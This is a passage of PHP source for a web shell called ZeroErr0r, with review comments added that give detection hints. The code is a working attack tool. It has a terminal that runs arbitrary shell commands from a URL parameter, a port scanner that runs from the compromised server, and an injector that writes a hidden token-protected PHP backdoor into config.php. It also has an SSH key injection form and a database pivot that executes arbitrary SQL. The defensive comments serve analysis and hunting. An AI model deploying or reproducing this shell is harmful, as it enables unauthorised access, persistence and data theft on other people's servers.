<td><?php if(which("tar")) { ech
o shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td>
</tr>
<tr>
<td>Perl</td>
<td><?php if(which("perl")) { ec
ho shell_exec("perl -e 'print $];'"); } ?></td>
</tr>
<tr>
<td>GCC</td>
<td><?php if(which("perl")) { ec
ho shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td>
</tr>
</table>
<p class="info_head" onclick="toggle(this)">PHP
Configuration</p>
<table class="off">
<?php
foreach (parse_ini_file(php_ini_loaded_f
ile()) as $key => $value) {
echo "<tr>";
echo "<td>" . $key . "</td>";
echo "<td>" . $value . "</td>";
echo "</tr>";
}
?>
</table>
</div>
<!-- TERMINAL -->
<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'term
inal') { ?>
<pre style="height: 300px;word-wrap: break-word;"><code
class="sh"><?php if (isset($_GET['cmd'])) {
// NOTE(review): interactive command runner. The command arrives in the GET
// parameter `cmd` (the form below submits view=terminal plus cmd), so each
// command is recorded URL-encoded in the web server's access log; searching
// those logs for `view=terminal` together with `cmd=` reconstructs the session.
$cmd = $_GET['cmd'];
// Any command containing the substring "cd" also updates the stored working
// directory from the token that follows "cd".
if (strpos($_GET['cmd'], 'cd') !== false) {
$tmp = explode(" ", $_GET['cmd']);
$direct = getcwd() . "/" . $tmp[array_se
arch('cd', $tmp) + 1];
chdir($direct);
$_SESSION['cd'] = $direct;
echo "<script>document.location = '?view
=terminal';</script>";
}
$tmp = explode(" ", $_GET['cmd']);
// A leading "edit" token redirects to the file editor for the named file.
if (array_search('edit', $tmp) === 0) {
$direct = getcwd() . "/" . $tmp[array_se
arch('edit', $tmp) + 1];
echo "<script>document.location = '?view
=" . urlencode($direct) . "&action=edit';</script>";
}
// stderr is merged into stdout before the command is handed to ex().
echo htmlentities(ex($cmd . " 2>&1"));
} ?></code></pre>
<br>
<form action="?" method="get">
<input type="hidden" name="view" value="terminal
">
<?php echo get_current_user(); ?>:
<input id="cmd" type="text" name="cmd" spellchec
k="false" autocomplete="off" value="" autofocus placeholder=" shell command -">
</form>
<!-- PORT_SCANNER -->
<?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port
_scanner') { ?>
<form action="" method="post" class="port_scanner">
<table>
<tr>
<td width="10%">Host:</td>
<td width="90%"><input type="tex
t" name="host" value="localhost" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="10%">Port Start:</td>
<td width="90%"><input type="tex
t" name="sport" value="0" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="10%">Port End:</td>
<td width="90%"><input type="tex
t" name="eport" value="5000" autocomplete="off" spellcheck="false"></td>
</tr>
</table>
<input type="submit" name="scan" value="SCAN!">
</form>
<?php if (isset($_POST['scan'])) { ?>
<div class="result" style="background-color: #07
1414;padding: 0;padding-top: 20px;">
<table>
<?php
// NOTE(review): TCP connect sweep issued from the web server itself. Each port
// from `sport` to `eport` on `host` gets one fsockopen() attempt with a
// 3-second timeout, so the traffic originates from the server's address and
// can reach hosts that only it can see.
// Detection: the web-server process opening connections to many sequential
// ports on one destination. Mitigation: egress filtering for the web tier.
// The opened sockets are not closed in this loop.
$start = strip_tags($_POST['spor
t']);
$end = strip_tags($_POST['eport']);
$host = strip_tags($_POST['host']);
for($i = $start; $i<=$end; $i++){
$fp = @fsockopen($host, $i, $errno,
$errstr, 3);
if($fp){
if ($i == 22 OR $i == 2222) {
echo '<tr><td width="5%"
style="background-color: #FFA800;"><font color=white>open</font></td><td width=
"95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to
SSH Injection</td></tr>';
} else {
echo '<tr><td width="5%"
style="background-color: #16A086;"><font color=white>open</font></td><td width=
"95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>';
}
}
flush();
}
?>
</table>
</div>
<?php } ?>
<!-- INJECTOR -->
<?php } else if (isset($_GET['view']) AND $_GET['view']
== 'injector') { ?>
<?php if (!isset($_GET['action'])) { ?>
<form action="" method="post" class="port_scanne
r">
<table>
<tr>
<td width="30%">Injectab
le File Path:</td>
<td width="70%"><input t
ype="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR .
'config.php'; ?>" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="30%">Code Typ
e:</td>
<td width="70%"><select
name="inject_code_type">
<option value="r
everse_command">Reverse Command</option>
</select></td>
</tr>
<tr>
<td width="30%">Language
:</td>
<td width="70%"><select
name="inject_lang">
<option value="r
everse_command">PHP</option>
</select></td>
</tr>
</table>
<input type="submit" name="inject" value
="INJECT CODE!">
</form>
<?php if (isset($_POST['inject'])) { ?>
<pre class="result" style="font-
size: 1.3rem;"><?php
// NOTE(review): secondary-backdoor dropper. The statements that follow build a
// small PHP command runner in a heredoc and write it to `inject_path`, but only
// when that file does not already exist and its directory is writable.
// Hunting strings present in the dropped file: the `{ZERO}` field separator and
// the message `Error: invalid token!`. The form's default target is config.php
// in the current directory.
// $type and $lang are read here but not referenced again in the visible code.
$path = strip_ta
gs($_POST['inject_path']);
$type = strip_tags($_POS
T['inject_code_type']);
$lang = strip_tags($_POS
T['inject_lang']);
// Token embedded in the dropped file; derived from rand(), not a CSPRNG.
$token = md5(rand(111111
, 999999));
$code = <<<EOF
<?php
session_start();
if (isset(\$_SESSION['cd'])) {
chdir(\$_SESSION['cd']);
}
if (\$_SERVER['REQUEST_METHOD'] == 'POST') {
\$cmd = base64_decode(\$_POST['cmd']) . " 2>&1";
if (\$_POST['token'] != '$token') {
echo "Error: invalid token!";
die();
}
if (strpos(\$cmd, 'cd') !== false) {
\$tmp = explode(" ", \$cmd);
\$direct = getcwd() . "/" . \$tmp[array_search('cd', \$t
mp) + 1];
chdir(\$direct);
\$_SESSION['cd'] = \$direct;
}
if (0 == posix_getuid()) {
\$isRoot = "#";
} else {
\$isRoot = "$";
}
echo get_current_user() . "{ZERO}" . getcwd() . "{ZERO}" . \$isR
oot . "{ZERO}" . shell_exec(\$cmd);
die();
}
?>
EOF;
$pathinfo = path
info($path);
if (is_writable(
$pathinfo['dirname'])) {
if (!fil
e_exists($path)) {
$file = fopen($path, 'w+');
fwrite($file, $code);
fclose($file);
echo "[+] Message: code has been injected!<br>";
echo "[+] Method: POST<br>";
echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\
\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>";
echo "[+] Variable: cmd<br>";
echo "[+] Token: " . $token;
} else {
echo "File exist!";
}
} else { echo "[
-] Error: permission denied!"; }
?>
</pre><?php } ?>
<?php } else if (isset($_GET['action']) AND $_GE
T['action'] == 'ssh') { ?>
<form action="" method="post">
<textarea style="height: 200px;"
name="pub_key" placeholder="Enter the public key here!"></textarea>
<input type="submit" name="injec
t_key" value="INJECT KEY!">
</form>
<?php } ?>

<!-- DATABASE -->


<?php } else if (isset($_GET['view']) AND $_GET['view']
== 'database') { ?>
<form action="?view=database" method="post" class="port_
scanner">
<?php if (isset($_SESSION['mysql_user'])) { ?>
<select name="mysql_db">
<?php
$link = mysqli_connect($_SESSION
['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']);
if (!($result=mysqli_query($link
,"show databases"))) {
printf("Error: %s\n", mysqli_err
or($link));
}
while( $row = mysqli_fetch_row(
$result ) ){
if (isset($_POST['mysql_
db'])) {
if ($row[0] == $_POST['m
ysql_db']) {
echo "<option value=
'" . $row[0] . "' selected>" . $row[0] . "</option>";
} else {
echo "<option value=
'" . $row[0] . "'>" . $row[0] . "</option>";
}
} else {
echo "<option value='" . $ro
w[0] . "'>" . $row[0] . "</option>";
}
}
?>
</select><br><br>
<textarea name="mysql_query" style="bord
er: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" plac
eholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_que
ry']; } ?></textarea>
<input type="submit" name="execute_mysql
" value="EXECUTE QUERY!">
<?php } else { ?>
<table>
<tr>
<td width="20%">MySQL Se
rver:</td>
<td width="80%"><input t
ype="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="
false"></td>
</tr>
<tr>
<td width="20%">User:</t
d>
<td width="80%"><input t
ype="text" name="mysql_user" autocomplete="off" spellcheck="false"></td>
</tr>
<tr>
<td width="20%">Password
:</td>
<td width="80%"><input t
ype="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td>
</tr>
</table><br>
<input type="submit" name="connect_mysql
" value="CONNECT!">
</form>
<?php } ?>
<?php if (isset($_POST['connect_mysql'])) {
// NOTE(review): database pivot. Connects from the web host to whichever MySQL
// server the form names and, on success, keeps the working credentials in the
// session for later queries.
// Incident response: if this page was reachable, treat any database
// credentials stored in files the web server can read as exposed, and review
// MySQL logins that originate from the web host.
$server = $_POST['mysql_server'];
$user = $_POST['mysql_user'];
$pass = $_POST['mysql_pass'];
$link = mysqli_connect($server,$user,$pa
ss);
if ($link) {
$_SESSION['mysql_user'] = $user;
$_SESSION['mysql_pass'] = $pass;
$_SESSION['mysql_server'] = $ser
ver;
echo "<script>document.location
= '?view=database';</script>";
} else {
echo "<div class='result'>Could
not connect, check the credential</div>";
}
// if (!($result=mysqli_query($link,$que
ry))) {
// printf("Error: %s\n", mysqli_
error($link));
// }
// while( $row = mysqli_fetch_row( $resu
lt ) ){
// if (($row[0]!="information_schema") &
& ($row[0]!="mysql")) {
// echo $row[0]."\r\n";
// }
// }
} ?>
<?php if (isset($_POST['execute_mysql'])) { ?>
<table class="result" style="overflow: auto;"><?php
// Handler for the EXECUTE QUERY! button of the SQL panel.
// Connects with the session-stored credentials to the database named in
// POST mysql_db and passes POST mysql_query to mysqli_query() verbatim, so
// the operator can run any statement the stored account is allowed to run.
// The return value of mysqli_query() is not checked before it is used.
$link = mysqli_connect($_SESSION['mysql_
server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']);
$query = mysqli_query($link, $_POST['mys
ql_query']);
// The first row is fetched only to print its column names as a header row.
$row = mysqli_fetch_assoc($query);
echo "<tr>";
foreach ($row as $key => $value) {
echo "<td style='border: 2px das
hed #555; padding: 5px;'>" . $key . "</td>";
}
echo "</tr>";
// Rewind to row 0 so the loop below prints every row, including the first.
mysqli_data_seek( $query, 0 );
// Column names and cell values are written into the table without HTML
// escaping.
while( $row = mysqli_fetch_assoc( $query ) ) {
echo "<tr>";
foreach ($row as $key => $value) {
echo "<td style='border:
2px dashed #555; padding: 5px;'>" . $value . "</td>";
}
echo "</tr>";
}
?></table>
<?php } ?>
<?php } ?>
</div>
</section>
<footer>Copyright &copy;ZeroErr0r - <?php echo date('Y') ?></footer>
<script type="text/javascript">
/**
 * Asks the operator for a new file name and triggers the server-side rename.
 *
 * The request is a plain GET navigation to ?from=<rename_path>&to=<name>, so
 * both values end up in the web server's access log. Neither value is
 * URL-encoded before being concatenated.
 *
 * @param rename_path value sent as the `from` parameter
 * @param file        current name, pre-filled in the prompt
 */
function rename(rename_path, file) {
var to = prompt("Enter a new file name", file);
// Runs before the null check below: a cancelled prompt returns null, so
// reading .length here throws.
console.log(to.length);
if (to !== null && to.length > 0) {
document.location = "?from=" + rename_path + "&to=" + to
;
}
}
/**
 * Asks the operator for a file name and triggers server-side file creation.
 *
 * Navigates to ?touch=<touch_path>&file=<name>; the parameters travel in the
 * query string of a GET request and are not URL-encoded.
 *
 * @param touch_path value sent as the `touch` parameter
 */
function touch(touch_path) {
var to = prompt("Enter a file name");
// Nothing is sent when the prompt is cancelled or left empty.
if (to !== null && to.length > 0) {
document.location = "?touch=" + touch_path + "&file=" +
to;
}
}
/**
 * Asks the operator for a folder name and triggers server-side directory
 * creation.
 *
 * Navigates to ?mkdir_path=<mkdir_path>&folder=<name>; the parameters travel
 * in the query string of a GET request and are not URL-encoded.
 *
 * @param mkdir_path value sent as the `mkdir_path` parameter
 */
function mkdir(mkdir_path) {
var to = prompt("Enter a folder name");
// Nothing is sent when the prompt is cancelled or left empty.
if (to !== null && to.length > 0) {
document.location = "?mkdir_path=" + mkdir_path + "&fold
er=" + to;
}
}
// Live collection of the per-file checkboxes in the file listing.
var file_select = document.getElementsByClassName('file_select');
/**
 * Refreshes the listing after a checkbox change.
 *
 * Calls showAction() (defined outside this part of the file) and then
 * highlights every checked entry: the checkbox is made fully opaque and the
 * element two levels above it gets a background colour; unchecked entries
 * have both inline styles cleared. Purely cosmetic, no request is sent.
 */
function fileSelectCheck() {
showAction();
for (var i = 0; i < file_select.length; i++) {
if (file_select[i].checked) {
file_select[i].setAttribute('style', 'opacity:1;
');
document.getElementsByClassName('file_select')[i
].parentElement.parentElement.setAttribute('style', "background-color: #1A272E")
;
} else {
file_select[i].setAttribute('style', '');
document.getElementsByClassName('file_select')[i
].parentElement.parentElement.setAttribute('style', '');
}
}
}
/**
 * Triggers deletion of every checked file in one request.
 *
 * Builds ?rmfile0=<v>&rmfile1=<v>&...&multirmfile=<total> and navigates to
 * it, without a confirmation prompt. The request is a GET, so the full list
 * of deleted paths is visible in the access log; the rmfileN / multirmfile
 * parameter names are distinctive enough to search for.
 */
function filesDelete() {
var files = [];
var s = document.getElementsByClassName('file_select');
var c = 0;
// Collect the value of each checked checkbox.
for (var i = 0; i < s.length; i++) {
if (s[i].checked) {
files[c] = s[i].value;
c++;
}
}
// total starts at 1, so multirmfile is the number of files plus one.
var q = "", total = 1;
for (var i = 0; i < files.length; i++) {
q += "rmfile" + i + "=" + files[i] + "&";
total++;
}
document.location = "?" + q + "multirmfile=" + total;
}
/**
 * Triggers server-side archiving of every checked file in one request.
 *
 * Builds ?action=zip&file0=<v>&file1=<v>&...&numfiles=<total> and navigates
 * to it. The request is a GET, so the archived paths are visible in the
 * access log under the action=zip / fileN / numfiles parameters.
 */
function filesCompress() {
var files = [];
var s = document.getElementsByClassName('file_select');
var c = 0;
// Collect the value of each checked checkbox.
for (var i = 0; i < s.length; i++) {
if (s[i].checked) {
files[c] = s[i].value;
c++;
}
}
// Unlike filesDelete(), total starts at 0 and equals the number of files.
var q = "", total = 0;
for (var i = 0; i < files.length; i++) {
q += "file" + i + "=" + files[i] + "&";
total++;
}
document.location = "?action=zip&" + q + "numfiles=" + total;
}
/**
 * Flips the class of the node two siblings after `el` between 'on' and 'off'.
 *
 * Any class value other than 'on' is treated as off and switched to 'on'.
 * UI-only helper; no request is sent.
 *
 * @param el element whose second next sibling is toggled
 */
function toggle(el) {
if (el.nextSibling.nextSibling.getAttribute('class') == 'on') {
el.nextSibling.nextSibling.setAttribute('class', 'off')
} else {
el.nextSibling.nextSibling.setAttribute('class', 'on')
}
}
</script>
<script>hljs.initHighlightingOnLoad();</script>
</body>
</html>
